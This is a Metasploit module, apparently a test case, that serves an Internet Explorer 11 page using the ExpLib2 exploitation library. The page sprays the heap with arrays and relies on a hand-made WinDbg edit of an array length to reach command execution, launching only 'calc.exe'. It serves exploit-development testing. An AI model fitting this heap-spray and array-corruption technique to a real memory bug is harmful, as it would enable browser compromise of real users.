##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Integration test case for the ExpLib2 JavaScript library inside Metasploit.
#
# The served page does not trigger a vulnerability on its own. Its embedded
# comment and alert ask the person running the test to change an array length
# field by hand in WinDbg, standing in for the memory write a real bug would
# provide. The command handed to the library's payload helper is the fixed
# string 'calc.exe'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info with the values declared here.
  def initialize(info = {})
    # Client profile declared for this test page: Windows, Internet Explorer
    # 11.0, and a profile source matching /script/i.
    # NOTE(review): how these are enforced is up to BrowserExploitServer,
    # which is not visible in this file.
    browser_requirements = {
      source: /script/i,
      os_name: OperatingSystems::WINDOWS,
      ua_name: HttpClients::IE,
      ua_ver: '11.0'
    }

    super(
      update_info(
        info,
        'Name' => 'Explib2 Exec Test Case',
        'Description' => %q{
          This module allows to test integration of Explib2 into metasploit.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'guhe120', # Original explib2 author
          'juan vazquez'
        ],
        'References' => [
          ['URL', 'https://github.com/jvazquez-r7/explib2'] # The original repo has been deleted
        ],
        'Platform' => 'win',
        'BrowserRequirements' => browser_requirements,
        'Targets' => [
          ['Automatic', {}]
        ],
        'DisclosureDate' => '2014-03-28',
        'DefaultTarget' => 0
      )
    )
  end

  # Builds the ERB page template for the test case.
  #
  # The template is returned unrendered. The two ERB tags reference
  # js_explib2_payload and js_explib2, which are resolved against the
  # returned binding when the template is rendered.
  #
  # @return [Array] two elements: the template String and this method's Binding.
  def exploit_html
    # The literal is kept exactly as written, including the trailing
    # indentation before the closing delimiter, so the served bytes stay
    # the same.
    page_template = %Q|<html>
<head>
  <script>
    <%=js_explib2_payload%>
  </script>
  <script>
    <%=js_explib2%>
  </script>
</head>
<body>
<script>

var num_arrays = 98688;
var arr_size = (0x1000 - 0x20)/4;
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') );
explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
explib.spray();

/*
* Modify array length
* In the real world exp, you  need to modify the array length field with your vulnerability
*/
alert( 'Execute the command in windbg: "ed 1a1b3000+18 400"' );

explib.go();

</script>
</body>
</html>
    |

    [page_template, binding]
  end

  # Request callback: answers the client with the test page.
  #
  # @param cli the client connection handed in by the HTTP server mixin.
  # @param request the incoming request (not used here).
  # @param target_info the detected client profile (not used here).
  def on_request_exploit(cli, request, target_info)
    # exploit_html yields a [template, binding] pair, passed on as a single argument.
    page = exploit_html
    send_exploit_html(cli, page)
  end
end
